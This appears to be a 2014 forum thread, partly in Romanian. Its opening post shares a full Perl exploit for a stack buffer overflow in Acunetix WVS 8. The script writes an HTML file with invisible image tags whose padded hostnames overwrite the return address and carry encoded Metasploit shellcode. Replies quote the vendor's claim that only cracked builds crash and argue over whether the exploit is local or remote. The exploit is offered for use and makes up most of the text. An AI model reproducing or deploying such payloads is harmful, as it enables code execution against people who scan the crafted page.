SirGod Posted April 24, 2014 Report Posted April 24, 2014 Have fun! # Exploit Title: Acunetix Stack Based overflow# Date: 24/04/14# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html# Vendor Homepage: http://www.acunetix.com/# Software Link: http://www.acunetix.com/vulnerability-scanner/download/# Version: 8 build 20120704# Tested on: XP[B]#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.[/B]my $file= "index.html";my $HTMLHeader1 = "<html>\r\n";my $HTMLHeader2 = "\r\n</html>";my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";my $IMGheader2 = "><br>\n";my $DomainName1 = "XSS";my $DomainName2 = "CSRF";my $DomainName3 = "DeepScan";my $DomainName4 = "NetworkScan";my $DomainName5 = "DenialOfService";my $GeneralDotPadding = "." x 190;my $ExploitDomain = "SQLInjection";my $DotPadding = "." x (202-length($ExploitDomain));my $Padding1 = "A"x66;my $Padding2 = "B"x4;my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flowmy $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).# windows/exec - 461 bytes# http://www.metasploit.com# Encoder: x86/alpha_upper# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,# CMD=calc.exemy $shellcode2 ="\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" ."\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" ."\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" ."\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" ."\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" ."\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" ."\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" ."\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" ."\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" ."\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" ."\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" ."\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" ."\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" ."\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" ."\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" ."\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" ."\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" ."\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" ."\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" ."\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" ."\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" ."\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" ."\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" ."\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" ."\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" ."\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" ."\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" ."\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" ."\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" ."\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" ."\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" ."\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" ."\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;open($FILE,">$file");print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;close($FILE);print"Acunetix Killer File Created successfully\n"; Quote
tpad Posted April 24, 2014 Report Posted April 24, 2014 (edited) acunetix39 minutes agoWe cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9.However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the cracked replaced the executable with another executable.?It figures. Edited April 24, 2014 by tpad Quote
sleed Posted April 24, 2014 Report Posted April 24, 2014 Foarte tare L-a testat cineva? ca eu nu am Acunetix Quote
neox Posted April 26, 2014 Report Posted April 26, 2014 La prima vedere pare interesant dar nu este Remote exploit este un exploit local se vede clar crearea file index.htmlAn7i Security: Pwn the n00bs - Acunetix 0day ---> videoOri sunt eu batut in cap dar asta este local exploit .De exemplu exploitul asta de la exploit-db Acunetix 8 build 20120704 - Remote Stack Based Overflow Acunetix 8 build 20120704 arata ca un exploit remote dar tot asa "create file" foloseste payload ca calc si back-connect nu atac direct port sau alte minuni ca sa fie remote.In video asta tot asa create file . Eu zic ca asta este local exploit Quote